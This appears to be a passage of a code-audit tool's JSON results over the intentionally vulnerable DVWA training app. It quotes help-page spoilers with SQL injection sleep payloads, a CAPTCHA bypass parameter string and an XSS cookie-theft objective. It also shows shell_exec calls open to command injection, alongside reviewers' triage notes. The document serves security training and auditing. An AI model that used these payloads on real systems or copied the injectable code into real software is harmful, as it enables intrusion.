  "file": "/home/chris/src/DVWA-master/vulnerabilities/sqli_blind/help/help.php",
  "filetype": "php",
  "search": "\\squery",
  "match": "<span class=\"line-number\">22:</span> \n<span class=\"line-number\">23:</span> \t\t<span class=\"token operator\">&lt;</span>br <span class=\"token operator\">/</span><span class=\"token operator\">></span><span class=\"token operator\">&lt;</span>hr <span class=\"token operator\">/</span><span class=\"token operator\">></span><span class=\"token operator\">&lt;</span>br <span class=\"token operator\">/</span><span class=\"token operator\">></span>\n<span class=\"line-number\">24:</span> \n<span class=\"line-number\">25:</span> \t\t<span class=\"token operator\">&lt;</span>h3<span class=\"token operator\">></span>Low Level<span class=\"token operator\">&lt;</span><span class=\"token operator\">/</span>h3<span class=\"token operator\">></span>\n<span class=\"line-number\">26:</span> \t\t<span class=\"token operator\">&lt;</span>p<span class=\"token operator\">></span>The SQL query uses RAW input that is directly controlled by the attacker<span class=\"token punctuation\">.</span> All they need <span class=\"token keyword\">to</span><span class=\"token operator\">-</span><span class=\"token keyword\">do</span> is escape the query <span class=\"token operator\">and</span> <span class=\"token keyword\">then</span> they are able\n<span class=\"highlight\"><span class=\"line-number\">27:</span> \t\t\t<span class=\"token keyword\">to</span> execute any SQL query they wish<span class=\"token punctuation\">.</span><span class=\"token operator\">&lt;</span><span class=\"token operator\">/</span>p<span class=\"token operator\">></span></span>\n<span class=\"line-number\">28:</span> \t\t<span class=\"token operator\">&lt;</span>pre<span class=\"token operator\">></span>Spoiler<span class=\"token punctuation\">:</span> <span class=\"token operator\">&lt;</span>span class<span class=\"token operator\">=</span><span class=\"token string\">\"spoiler\"</span><span class=\"token operator\">></span><span class=\"token operator\">?</span>id<span class=\"token 
operator\">=</span><span class=\"token number\">1</span>' <span class=\"token operator\">AND</span> sleep <span class=\"token number\">5</span><span class=\"token operator\">&amp;</span>Submit<span class=\"token operator\">=</span>Submit<span class=\"token operator\">&lt;</span><span class=\"token operator\">/</span>span<span class=\"token operator\">></span><span class=\"token punctuation\">.</span><span class=\"token operator\">&lt;</span><span class=\"token operator\">/</span>pre<span class=\"token operator\">></span>\n<span class=\"line-number\">29:</span> \n<span class=\"line-number\">30:</span> \t\t<span class=\"token operator\">&lt;</span>br <span class=\"token operator\">/</span><span class=\"token operator\">></span>\n<span class=\"line-number\">31:</span> \n<span class=\"line-number\">32:</span> \t\t<span class=\"token operator\">&lt;</span>h3<span class=\"token operator\">></span>Medium Level<span class=\"token operator\">&lt;</span><span class=\"token operator\">/</span>h3<span class=\"token operator\">></span>",
  "line": 27,
  "start": 22,
  "end": 33,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 211,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/sqli_blind/help/help.php",
  "filetype": "php",
  "search": "\\squery",
  "match": "<span class=\"line-number\">30:</span> \t\t<span class=\"token operator\">&lt;</span>br <span class=\"token operator\">/</span><span class=\"token operator\">></span>\n<span class=\"line-number\">31:</span> \n<span class=\"line-number\">32:</span> \t\t<span class=\"token operator\">&lt;</span>h3<span class=\"token operator\">></span>Medium Level<span class=\"token operator\">&lt;</span><span class=\"token operator\">/</span>h3<span class=\"token operator\">></span>\n<span class=\"line-number\">33:</span> \t\t<span class=\"token operator\">&lt;</span>p<span class=\"token operator\">></span>The medium level uses a form of SQL injection protection<span class=\"token punctuation\">,</span> <span class=\"token keyword\">with</span> the function of\n<span class=\"line-number\">34:</span> \t\t\t\"<span class=\"token operator\">&lt;</span><span class=\"token operator\">?</span>php echo <span class=\"token function\">dvwaExternalLinkUrlGet</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'https://secure.php.net/manual/en/function.mysql-real-escape-string.php'</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'mysql_real_escape_string()'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">; ?>\".</span>\n<span class=\"highlight\"><span class=\"line-number\">35:</span> \t\t\tHowever due <span class=\"token keyword\">to</span> the SQL query <span class=\"token operator\">not</span> having quotes around the parameter<span class=\"token punctuation\">,</span> this will <span class=\"token operator\">not</span> fully protect the query from being altered<span class=\"token punctuation\">.</span><span class=\"token operator\">&lt;</span><span class=\"token operator\">/</span>p<span class=\"token operator\">></span></span>\n<span class=\"line-number\">36:</span> \n<span class=\"line-number\">37:</span> \t\t<span class=\"token operator\">&lt;</span>p<span class=\"token 
operator\">></span>The text box has been replaced <span class=\"token keyword\">with</span> a pre<span class=\"token operator\">-</span>defined dropdown list <span class=\"token operator\">and</span> uses POST <span class=\"token keyword\">to</span> submit the form<span class=\"token punctuation\">.</span><span class=\"token operator\">&lt;</span><span class=\"token operator\">/</span>p<span class=\"token operator\">></span>\n<span class=\"line-number\">38:</span> \t\t<span class=\"token operator\">&lt;</span>pre<span class=\"token operator\">></span>Spoiler<span class=\"token punctuation\">:</span> <span class=\"token operator\">&lt;</span>span class<span class=\"token operator\">=</span><span class=\"token string\">\"spoiler\"</span><span class=\"token operator\">></span><span class=\"token operator\">?</span>id<span class=\"token operator\">=</span><span class=\"token number\">1</span> <span class=\"token operator\">AND</span> sleep <span class=\"token number\">3</span><span class=\"token operator\">&amp;</span>Submit<span class=\"token operator\">=</span>Submit<span class=\"token operator\">&lt;</span><span class=\"token operator\">/</span>span<span class=\"token operator\">></span><span class=\"token punctuation\">.</span><span class=\"token operator\">&lt;</span><span class=\"token operator\">/</span>pre<span class=\"token operator\">></span>\n<span class=\"line-number\">39:</span> \n<span class=\"line-number\">40:</span> \t\t<span class=\"token operator\">&lt;</span>br <span class=\"token operator\">/</span><span class=\"token operator\">></span>",
  "line": 35,
  "start": 30,
  "end": 41,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 212,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/sqli_blind/help/help.php",
  "filetype": "php",
  "search": "\\squery",
  "match": "<span class=\"line-number\">46:</span> \t\t\tSpoiler<span class=\"token punctuation\">:</span> <span class=\"token operator\">&lt;</span>span class<span class=\"token operator\">=</span><span class=\"token string\">\"spoiler\"</span><span class=\"token operator\">></span>Should be able <span class=\"token keyword\">to</span> cut out the middle man<span class=\"token punctuation\">.</span><span class=\"token operator\">&lt;</span><span class=\"token operator\">/</span>span<span class=\"token operator\">></span><span class=\"token punctuation\">.</span><span class=\"token operator\">&lt;</span><span class=\"token operator\">/</span>pre<span class=\"token operator\">></span>\n<span class=\"line-number\">47:</span> \n<span class=\"line-number\">48:</span> \t\t<span class=\"token operator\">&lt;</span>br <span class=\"token operator\">/</span><span class=\"token operator\">></span>\n<span class=\"line-number\">49:</span> \n<span class=\"line-number\">50:</span> \t\t<span class=\"token operator\">&lt;</span>h3<span class=\"token operator\">></span>Impossible Level<span class=\"token operator\">&lt;</span><span class=\"token operator\">/</span>h3<span class=\"token operator\">></span>\n<span class=\"highlight\"><span class=\"line-number\">51:</span> \t\t<span class=\"token operator\">&lt;</span>p<span class=\"token operator\">></span>The queries are now parameterized queries <span class=\"token punctuation\">(</span>rather than being dynamic<span class=\"token punctuation\">)</span><span class=\"token punctuation\">.</span> This means the query has been defined by the developer<span class=\"token punctuation\">,</span></span>\n<span class=\"line-number\">52:</span> \t\t\t<span class=\"token operator\">and</span> has distinguish which sections are code<span class=\"token punctuation\">,</span> <span class=\"token operator\">and</span> the rest is data<span class=\"token punctuation\">.</span><span class=\"token operator\">&lt;</span><span class=\"token 
operator\">/</span>p<span class=\"token operator\">></span>\n<span class=\"line-number\">53:</span> \t<span class=\"token operator\">&lt;</span><span class=\"token operator\">/</span>div<span class=\"token operator\">></span><span class=\"token operator\">&lt;</span><span class=\"token operator\">/</span>td<span class=\"token operator\">></span>\n<span class=\"line-number\">54:</span> \t<span class=\"token operator\">&lt;</span><span class=\"token operator\">/</span>tr<span class=\"token operator\">></span>\n<span class=\"line-number\">55:</span> \t<span class=\"token operator\">&lt;</span><span class=\"token operator\">/</span>table<span class=\"token operator\">></span>\n<span class=\"line-number\">56:</span> ",
  "line": 51,
  "start": 46,
  "end": 57,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 35,
  "file": "/home/chris/src/DVWA-master/dvwa/includes/dvwaPhpIds.inc.php",
  "filetype": "php",
  "search": "\\srequire",
  "match": "<span class=\"line-number\">74:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> <span class=\"token number\">2</span><span class=\"token punctuation\">.</span> Initiate the PHPIDS <span class=\"token operator\">and</span> fetch the results\n<span class=\"line-number\">75:</span> \t\t<span class=\"token variable\">$ids</span> <span class=\"token operator\">=</span> new <span class=\"token function\">IDS_Monitor</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$request</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$init</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">76:</span> \t\t<span class=\"token variable\">$result</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$ids</span><span class=\"token operator\">-</span><span class=\"token operator\">></span><span class=\"token function\">run</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">77:</span> \n<span class=\"line-number\">78:</span> \t\t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> !<span class=\"token variable\">$result</span><span class=\"token operator\">-</span><span class=\"token operator\">></span><span class=\"token function\">isEmpty</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"highlight\"><span class=\"line-number\">79:</span> \t\t\trequire_once <span class=\"token string\">'IDS/Log/File.php'</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">80:</span> \t\t\trequire_once <span class=\"token string\">'IDS/Log/Composite.php'</span><span class=\"token 
comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">81:</span> \n<span class=\"line-number\">82:</span> \t\t\t<span class=\"token variable\">$compositeLog</span> <span class=\"token operator\">=</span> new <span class=\"token function\">IDS_Log_Composite</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">83:</span> \t\t\t<span class=\"token variable\">$compositeLog</span><span class=\"token operator\">-</span><span class=\"token operator\">></span><span class=\"token function\">addLogger</span><span class=\"token punctuation\">(</span>IDS_Log_File<span class=\"token punctuation\">:</span><span class=\"token punctuation\">:</span><span class=\"token function\">getInstance</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$init</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">84:</span> ",
  "line": 79,
  "start": 74,
  "end": 85,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 36,
  "file": "/home/chris/src/DVWA-master/dvwa/includes/dvwaPhpIds.inc.php",
  "filetype": "php",
  "search": "\\srequire",
  "match": "<span class=\"line-number\">75:</span> \t\t<span class=\"token variable\">$ids</span> <span class=\"token operator\">=</span> new <span class=\"token function\">IDS_Monitor</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$request</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$init</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">76:</span> \t\t<span class=\"token variable\">$result</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$ids</span><span class=\"token operator\">-</span><span class=\"token operator\">></span><span class=\"token function\">run</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">77:</span> \n<span class=\"line-number\">78:</span> \t\t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> !<span class=\"token variable\">$result</span><span class=\"token operator\">-</span><span class=\"token operator\">></span><span class=\"token function\">isEmpty</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">79:</span> \t\t\trequire_once <span class=\"token string\">'IDS/Log/File.php'</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"highlight\"><span class=\"line-number\">80:</span> \t\t\trequire_once <span class=\"token string\">'IDS/Log/Composite.php'</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">81:</span> \n<span class=\"line-number\">82:</span> \t\t\t<span class=\"token variable\">$compositeLog</span> <span class=\"token operator\">=</span> new <span class=\"token function\">IDS_Log_Composite</span><span 
class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">83:</span> \t\t\t<span class=\"token variable\">$compositeLog</span><span class=\"token operator\">-</span><span class=\"token operator\">></span><span class=\"token function\">addLogger</span><span class=\"token punctuation\">(</span>IDS_Log_File<span class=\"token punctuation\">:</span><span class=\"token punctuation\">:</span><span class=\"token function\">getInstance</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$init</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">84:</span> \n<span class=\"line-number\">85:</span> \t\t\t<span class=\"token variable\">$compositeLog</span><span class=\"token operator\">-</span><span class=\"token operator\">></span><span class=\"token function\">execute</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$result</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
  "line": 80,
  "start": 75,
  "end": 86,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 88,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/captcha/help/help.php",
  "filetype": "php",
  "search": "\\srequire",
  "match": "<span class=\"line-number\">24:</span> \n<span class=\"line-number\">25:</span> \t\t<span class=\"token operator\">&lt;</span>h3<span class=\"token operator\">></span>Low Level<span class=\"token operator\">&lt;</span><span class=\"token operator\">/</span>h3<span class=\"token operator\">></span>\n<span class=\"line-number\">26:</span> \t\t<span class=\"token operator\">&lt;</span>p<span class=\"token operator\">></span>The issue <span class=\"token keyword\">with</span> this CAPTCHA is that it is easily bypassed<span class=\"token punctuation\">.</span> The developer has made the assumption that all users will progress through screen <span class=\"token number\">1</span><span class=\"token punctuation\">,</span> complete the CAPTCHA<span class=\"token punctuation\">,</span> <span class=\"token operator\">and</span> <span class=\"token keyword\">then</span>\n<span class=\"line-number\">27:</span> \t\t\tmove on <span class=\"token keyword\">to</span> the <span class=\"token keyword\">next</span> screen where the password is actually updated<span class=\"token punctuation\">.</span> By submitting the new password directly <span class=\"token keyword\">to</span> the change page<span class=\"token punctuation\">,</span> the user may bypass the CAPTCHA system<span class=\"token punctuation\">.</span><span class=\"token operator\">&lt;</span><span class=\"token operator\">/</span>p<span class=\"token operator\">></span>\n<span class=\"line-number\">28:</span> \n<span class=\"highlight\"><span class=\"line-number\">29:</span> \t\t<span class=\"token operator\">&lt;</span>p<span class=\"token operator\">></span>The parameters required <span class=\"token keyword\">to</span> complete this challenge <span class=\"token keyword\">in</span> low security would be similar <span class=\"token keyword\">to</span> the following<span class=\"token punctuation\">:</span><span class=\"token operator\">&lt;</span><span class=\"token operator\">/</span>p<span class=\"token 
operator\">></span></span>\n<span class=\"line-number\">30:</span> \t\t<span class=\"token operator\">&lt;</span>pre<span class=\"token operator\">></span>Spoiler<span class=\"token punctuation\">:</span> <span class=\"token operator\">&lt;</span>span class<span class=\"token operator\">=</span><span class=\"token string\">\"spoiler\"</span><span class=\"token operator\">></span><span class=\"token operator\">?</span><span class=\"token keyword\">step</span><span class=\"token operator\">=</span><span class=\"token number\">2</span><span class=\"token operator\">&amp;</span>password_new<span class=\"token operator\">=</span>password<span class=\"token operator\">&amp;</span>password_conf<span class=\"token operator\">=</span>password<span class=\"token operator\">&amp;</span>Change<span class=\"token operator\">=</span>Change<span class=\"token operator\">&lt;</span><span class=\"token operator\">/</span>span<span class=\"token operator\">></span><span class=\"token punctuation\">.</span><span class=\"token operator\">&lt;</span><span class=\"token operator\">/</span>pre<span class=\"token operator\">></span>\n<span class=\"line-number\">31:</span> \n<span class=\"line-number\">32:</span> \t\t<span class=\"token operator\">&lt;</span>br <span class=\"token operator\">/</span><span class=\"token operator\">></span>\n<span class=\"line-number\">33:</span> \n<span class=\"line-number\">34:</span> \t\t<span class=\"token operator\">&lt;</span>h3<span class=\"token operator\">></span>Medium Level<span class=\"token operator\">&lt;</span><span class=\"token operator\">/</span>h3<span class=\"token operator\">></span>",
  "line": 29,
  "start": 24,
  "end": 35,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 139,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/csrf/help/help.php",
  "filetype": "php",
  "search": "\\srequire",
  "match": "<span class=\"line-number\">30:</span> \t\t<span class=\"token operator\">&lt;</span>br <span class=\"token operator\">/</span><span class=\"token operator\">></span>\n<span class=\"line-number\">31:</span> \n<span class=\"line-number\">32:</span> \t\t<span class=\"token operator\">&lt;</span>h3<span class=\"token operator\">></span>Medium Level<span class=\"token operator\">&lt;</span><span class=\"token operator\">/</span>h3<span class=\"token operator\">></span>\n<span class=\"line-number\">33:</span> \t\t<span class=\"token operator\">&lt;</span>p<span class=\"token operator\">></span><span class=\"token keyword\">For</span> the medium level challenge<span class=\"token punctuation\">,</span> there is a check <span class=\"token keyword\">to</span> see where the last requested page came from<span class=\"token punctuation\">.</span> The developer believes <span class=\"token keyword\">if</span> it matches the current domain<span class=\"token punctuation\">,</span>\n<span class=\"line-number\">34:</span> \t\t\tit must of come from the web application so it can be trusted<span class=\"token punctuation\">.</span><span class=\"token operator\">&lt;</span><span class=\"token operator\">/</span>p<span class=\"token operator\">></span>\n<span class=\"highlight\"><span class=\"line-number\">35:</span> \t\t<span class=\"token operator\">&lt;</span>p<span class=\"token operator\">></span>It may be required <span class=\"token keyword\">to</span> link <span class=\"token keyword\">in</span> multiple vulnerabilities <span class=\"token keyword\">to</span> exploit this vector<span class=\"token punctuation\">,</span> such as reflective XSS<span class=\"token punctuation\">.</span><span class=\"token operator\">&lt;</span><span class=\"token operator\">/</span>p<span class=\"token operator\">></span></span>\n<span class=\"line-number\">36:</span> \n<span class=\"line-number\">37:</span> \t\t<span class=\"token operator\">&lt;</span>br <span class=\"token 
operator\">/</span><span class=\"token operator\">></span>\n<span class=\"line-number\">38:</span> \n<span class=\"line-number\">39:</span> \t\t<span class=\"token operator\">&lt;</span>h3<span class=\"token operator\">></span>High Level<span class=\"token operator\">&lt;</span><span class=\"token operator\">/</span>h3<span class=\"token operator\">></span>\n<span class=\"line-number\">40:</span> \t\t<span class=\"token operator\">&lt;</span>p<span class=\"token operator\">></span><span class=\"token keyword\">In</span> the high level<span class=\"token punctuation\">,</span> the developer has added an <span class=\"token string\">\"anti Cross-Site Request Forgery (CSRF) token\"</span><span class=\"token punctuation\">.</span> <span class=\"token keyword\">In</span> order by bypass this protection method<span class=\"token punctuation\">,</span> another vulnerability will be required<span class=\"token punctuation\">.</span><span class=\"token operator\">&lt;</span><span class=\"token operator\">/</span>p<span class=\"token operator\">></span>",
  "line": 35,
  "start": 30,
  "end": 41,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 140,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/csrf/help/help.php",
  "filetype": "php",
  "search": "\\srequire",
  "match": "<span class=\"line-number\">35:</span> \t\t<span class=\"token operator\">&lt;</span>p<span class=\"token operator\">></span>It may be required <span class=\"token keyword\">to</span> link <span class=\"token keyword\">in</span> multiple vulnerabilities <span class=\"token keyword\">to</span> exploit this vector<span class=\"token punctuation\">,</span> such as reflective XSS<span class=\"token punctuation\">.</span><span class=\"token operator\">&lt;</span><span class=\"token operator\">/</span>p<span class=\"token operator\">></span>\n<span class=\"line-number\">36:</span> \n<span class=\"line-number\">37:</span> \t\t<span class=\"token operator\">&lt;</span>br <span class=\"token operator\">/</span><span class=\"token operator\">></span>\n<span class=\"line-number\">38:</span> \n<span class=\"line-number\">39:</span> \t\t<span class=\"token operator\">&lt;</span>h3<span class=\"token operator\">></span>High Level<span class=\"token operator\">&lt;</span><span class=\"token operator\">/</span>h3<span class=\"token operator\">></span>\n<span class=\"highlight\"><span class=\"line-number\">40:</span> \t\t<span class=\"token operator\">&lt;</span>p<span class=\"token operator\">></span><span class=\"token keyword\">In</span> the high level<span class=\"token punctuation\">,</span> the developer has added an <span class=\"token string\">\"anti Cross-Site Request Forgery (CSRF) token\"</span><span class=\"token punctuation\">.</span> <span class=\"token keyword\">In</span> order by bypass this protection method<span class=\"token punctuation\">,</span> another vulnerability will be required<span class=\"token punctuation\">.</span><span class=\"token operator\">&lt;</span><span class=\"token operator\">/</span>p<span class=\"token operator\">></span></span>\n<span class=\"line-number\">41:</span> \t\t<span class=\"token operator\">&lt;</span>pre<span class=\"token operator\">></span>Spoiler<span class=\"token punctuation\">:</span> <span class=\"token 
operator\">&lt;</span>span class<span class=\"token operator\">=</span><span class=\"token string\">\"spoiler\"</span><span class=\"token operator\">></span>e<span class=\"token punctuation\">.</span>g<span class=\"token punctuation\">.</span> Javascript is a executed on the client side<span class=\"token punctuation\">,</span> <span class=\"token keyword\">in</span> the browser<span class=\"token operator\">&lt;</span><span class=\"token operator\">/</span>span<span class=\"token operator\">></span><span class=\"token punctuation\">.</span><span class=\"token operator\">&lt;</span><span class=\"token operator\">/</span>pre<span class=\"token operator\">></span>\n<span class=\"line-number\">42:</span> \n<span class=\"line-number\">43:</span> \t\t<span class=\"token operator\">&lt;</span>br <span class=\"token operator\">/</span><span class=\"token operator\">></span>\n<span class=\"line-number\">44:</span> \n<span class=\"line-number\">45:</span> \t\t<span class=\"token operator\">&lt;</span>h3<span class=\"token operator\">></span>Impossible Level<span class=\"token operator\">&lt;</span><span class=\"token operator\">/</span>h3<span class=\"token operator\">></span>",
  "line": 40,
  "start": 35,
  "end": 46,
  "severity": "unknown",
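  "note": "False positive: the pattern matched the word 'required' in help-page prose on line 40; there is no PHP require or include statement here."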
 },
 {
  "id": 281,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/xss_r/help/help.php",
  "filetype": "php",
  "search": "\\srequire",
  "match": "<span class=\"line-number\">13:</span> \n<span class=\"line-number\">14:</span> \t\t<span class=\"token operator\">&lt;</span>p<span class=\"token operator\">></span>An attacker can use XSS <span class=\"token keyword\">to</span> send a malicious script <span class=\"token keyword\">to</span> an unsuspecting user<span class=\"token punctuation\">.</span> The end user's browser has no way <span class=\"token keyword\">to</span> know that the script should <span class=\"token operator\">not</span> be trusted<span class=\"token punctuation\">,</span>\n<span class=\"line-number\">15:</span> \t\t\t<span class=\"token operator\">and</span> will execute the JavaScript<span class=\"token punctuation\">.</span> Because it thinks the script came from a trusted source<span class=\"token punctuation\">,</span> the malicious script can access any cookies<span class=\"token punctuation\">,</span> session tokens<span class=\"token punctuation\">,</span> <span class=\"token operator\">or</span> other\n<span class=\"line-number\">16:</span> \t\t\tsensitive information retained by your browser <span class=\"token operator\">and</span> used <span class=\"token keyword\">with</span> that site<span class=\"token punctuation\">.</span> These scripts can even rewrite the content of the HTML page<span class=\"token punctuation\">.</span><span class=\"token operator\">&lt;</span><span class=\"token operator\">/</span>p<span class=\"token operator\">></span>\n<span class=\"line-number\">17:</span> \n<span class=\"highlight\"><span class=\"line-number\">18:</span> \t\t<span class=\"token operator\">&lt;</span>p<span class=\"token operator\">></span>Because its a reflected XSS<span class=\"token punctuation\">,</span> the malicious code is <span class=\"token operator\">not</span> stored <span class=\"token keyword\">in</span> the remote web application<span class=\"token punctuation\">,</span> so requires some social engineering <span class=\"token punctuation\">(</span>such as a 
link via email<span class=\"token operator\">/</span>chat<span class=\"token punctuation\">)</span><span class=\"token punctuation\">.</span><span class=\"token operator\">&lt;</span><span class=\"token operator\">/</span>p<span class=\"token operator\">></span></span>\n<span class=\"line-number\">19:</span> \n<span class=\"line-number\">20:</span> \t\t<span class=\"token operator\">&lt;</span>br <span class=\"token operator\">/</span><span class=\"token operator\">></span><span class=\"token operator\">&lt;</span>hr <span class=\"token operator\">/</span><span class=\"token operator\">></span><span class=\"token operator\">&lt;</span>br <span class=\"token operator\">/</span><span class=\"token operator\">></span>\n<span class=\"line-number\">21:</span> \n<span class=\"line-number\">22:</span> \t\t<span class=\"token operator\">&lt;</span>h3<span class=\"token operator\">></span>Objective<span class=\"token operator\">&lt;</span><span class=\"token operator\">/</span>h3<span class=\"token operator\">></span>\n<span class=\"line-number\">23:</span> \t\t<span class=\"token operator\">&lt;</span>p<span class=\"token operator\">></span>One way <span class=\"token operator\">or</span> another<span class=\"token punctuation\">,</span> steal the cookie of a logged <span class=\"token keyword\">in</span> user<span class=\"token punctuation\">.</span><span class=\"token operator\">&lt;</span><span class=\"token operator\">/</span>p<span class=\"token operator\">></span>",
  "line": 18,
  "start": 13,
  "end": 24,
  "severity": "unknown",
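  "note": "False positive: the pattern matched the word 'requires' in help-page prose on line 18; there is no PHP require or include statement here."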
 },
 {
  "id": 175,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/exec/source/high.php",
  "filetype": "php",
  "search": "\\sshell_exec\\s*\\(",
  "match": "<span class=\"line-number\">21:</span> \t<span class=\"token variable\">$target</span> <span class=\"token operator\">=</span> <span class=\"token function\">str_replace</span><span class=\"token punctuation\">(</span> <span class=\"token function\">array_keys</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$substitutions</span> <span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$substitutions</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$target</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">22:</span> \n<span class=\"line-number\">23:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Determine OS <span class=\"token operator\">and</span> execute the ping command<span class=\"token punctuation\">.</span>\n<span class=\"line-number\">24:</span> \t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">stristr</span><span class=\"token punctuation\">(</span> <span class=\"token function\">php_uname</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'s'</span> <span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'Windows NT'</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">25:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Windows\n<span class=\"highlight\"><span class=\"line-number\">26:</span> \t\t<span class=\"token variable\">$cmd</span> <span class=\"token operator\">=</span> <span class=\"token function\">shell_exec</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'ping  '</span> <span class=\"token 
punctuation\">.</span> <span class=\"token variable\">$target</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">27:</span> \t}\n<span class=\"line-number\">28:</span> \t<span class=\"token keyword\">else</span> {\n<span class=\"line-number\">29:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> <span class=\"token operator\">*</span>nix\n<span class=\"line-number\">30:</span> \t\t<span class=\"token variable\">$cmd</span> <span class=\"token operator\">=</span> <span class=\"token function\">shell_exec</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'ping  -c 4 '</span> <span class=\"token punctuation\">.</span> <span class=\"token variable\">$target</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">31:</span> \t}",
  "line": 26,
  "start": 21,
  "end": 32,
  "severity": "unknown",
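  "note": "Triage: $target is concatenated into the shell_exec() command string. The only filtering visible is the str_replace() substitution on line 21; the substitution list and the origin of $target are outside this excerpt. Character denylists are a weak control for shell input; check for strict IP validation or escapeshellarg()."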
 },
 {
  "id": 176,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/exec/source/high.php",
  "filetype": "php",
  "search": "\\sshell_exec\\s*\\(",
  "match": "<span class=\"line-number\">25:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Windows\n<span class=\"line-number\">26:</span> \t\t<span class=\"token variable\">$cmd</span> <span class=\"token operator\">=</span> <span class=\"token function\">shell_exec</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'ping  '</span> <span class=\"token punctuation\">.</span> <span class=\"token variable\">$target</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">27:</span> \t}\n<span class=\"line-number\">28:</span> \t<span class=\"token keyword\">else</span> {\n<span class=\"line-number\">29:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> <span class=\"token operator\">*</span>nix\n<span class=\"highlight\"><span class=\"line-number\">30:</span> \t\t<span class=\"token variable\">$cmd</span> <span class=\"token operator\">=</span> <span class=\"token function\">shell_exec</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'ping  -c 4 '</span> <span class=\"token punctuation\">.</span> <span class=\"token variable\">$target</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">31:</span> \t}\n<span class=\"line-number\">32:</span> \n<span class=\"line-number\">33:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Feedback <span class=\"token keyword\">for</span> the end user\n<span class=\"line-number\">34:</span> \t<span class=\"token variable\">$html</span> <span class=\"token punctuation\">.</span><span class=\"token operator\">=</span> <span class=\"token string\">\"&lt;pre>{$cmd}&lt;/pre>\"</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">35:</span> }",
  "line": 30,
  "start": 25,
  "end": 36,
  "severity": "unknown",
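  "note": "Triage: same sink as line 26 of this file, on the non-Windows branch. Line 34 also writes the command output into $html without HTML encoding."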
 },
 {
  "id": 181,
